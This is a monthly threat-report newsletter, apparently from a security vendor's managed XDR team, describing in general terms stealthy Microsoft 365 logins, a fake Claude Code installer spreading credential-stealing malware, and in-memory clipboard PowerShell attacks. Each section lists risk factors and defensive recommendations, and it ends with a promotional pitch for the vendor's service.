SOC Threat Radar — May 2026

The latest Barracuda Research findings on threats facing businesses

Takeaways

• This month’s incidents mitigated by Barracuda Managed XDR show how modern attack techniques are designed to make attacks look normal, trusted or invisible.
• A rise in malicious Microsoft 365 logins with more convincing IPs and from low-risk sources.
• Attackers using a fake Claude AI installer to deliver malware.
• Malware delivered and executed directly from the clipboard to avoid detection.

Malicious Microsoft 365 logins look more convincing and low risk

What’s happening?

Attackers are successfully signing in to Microsoft 365 accounts using IP addresses that look more like legitimate users. To do this, attackers are using VPNs or frequently changing IP addresses. This helps their activity to blend in with everyday employee logins.

Researchers noted that in April there was an increase of around 25% in malicious logins coming from low-risk countries such as the UK and the U.S., rather than regions that are more usually associated with suspicious logins.

Because these incidents are successful sign-ins rather than failed login attempts, they can be harder for security tools looking for a pattern of repeat failures to detect as suspicious.

Your organization may be at risk if you:

• Mainly monitor failed login attempts and not successful ones
• Rely only on location-based rules to spot suspicious access
• Allow users to reuse passwords
• Have compromised accounts from a previous phishing attack
• Have a weak or inconsistent approach to multifactor authentication (MFA)
• Assume logins from the UK or U.S. are automatically “safe”

Once attackers have a valid login, they can quietly access email, files and internal systems without raising immediate alarms.

To protect your organization:

• Monitor all logins, regardless of source or outcome
• Follow up on any unusual or unexpected behavior after login (new devices, new locations, odd times)
• Enforce strong MFA everywhere, especially for email and admin accounts
• Regularly review sign-in logs for patterns that don’t match normal user behavior
• Use threat intelligence to identify known risky IPs, even if logins succeed

Fake Claude AI installer used to deliver malware

What’s happening?

Cybercriminals are using widespread interest in AI tools as a lure. In one example seen by Barracuda researchers, a user tried to download Claude Code but was redirected to a convincing fake website.

Instead of installing the real software, the site triggered a multi‑stage malware attack. The malware was able to execute a PowerShell script, steal browser-stored credentials, communicate with an attacker-controlled server, and make itself harder to remove by installing malicious certificates. The attack was contained within seconds, but even that was long enough for some post-exploitation activity, including credential access and persistence to take place.

Your organization may be at risk if you:

• Allow users to install software from any source — including search ads and unofficial sites — without checks or permissions
• Don’t manage and control the use of AI tools across the organization
• Permit the use of browser-stored credentials
• Haven’t integrated AI-related scams into your security awareness training

As AI tools become more common at work, attackers are increasingly using AI‑branded names to make their malware look trustworthy.

To protect your organization:

• Establish policies that ensure staff can only install software from official vendor websites
• Block lookalike and newly registered domains where possible
• Educate users that AI tools are now a high‑value lure for attackers
• Limit who can install software on company devices
• Use endpoint protection that can spot malicious behavior, not just known files

Malware using clipboard tricks to avoid detection

What’s happening?

Researchers found malware trying to evade detection by loading malicious code into the clipboard and running it directly in memory using PowerShell instead of installing a traditional malicious file onto a computer. Because nothing obvious was saved to disk, this technique is harder for basic security tools to catch.

Such incidents are categorized by researchers as high-severity activity. The malware was able to contact its command-and-control server, obtain the malicious payload, copy it into the clipboard, and execute it locally using PowerShell.

The suspicious command-and-control beacon triggered a security alert, and XDR quickly contained the threat.

Your organization may be at risk if:

• You rely mainly on antivirus software that scans files, rather than behavior.
• You enable unrestricted PowerShell use across endpoints.
• Endpoints aren’t monitored for suspicious in-memory activity.
• Admin tools are available to general users.
• There is limited visibility into what happens after a user clicks a link.

In-memory techniques are increasingly popular because they help attackers stay invisible for longer.

To protect your organization:

• Monitor behavior as well as files, and especially PowerShell activity
• Restrict PowerShell use to users who genuinely need it
• Flag any execution policy bypasses and unusual scripting behavior
• Quarantine devices automatically when suspected command‑and‑control activity is detected
• Assume attackers will try to avoid traditional malware files and plan detection accordingly

How Barracuda Managed XDR can help your organization

Barracuda Managed XDR delivers advanced protection against the threats identified in this report by combining cutting-edge technology with expert SOC oversight. With real-time threat intelligence, automated responses, a 24/7/365 SOC team, and 

XDR Managed Vulnerability Security that identifies security gaps and oversights, Barracuda Managed XDR ensures comprehensive, proactive protection across your network, cloud, email, servers, and endpoints, giving you the confidence to stay ahead of evolving threats.

For further information on how we can help, please get in touch with Barracuda Managed XDR.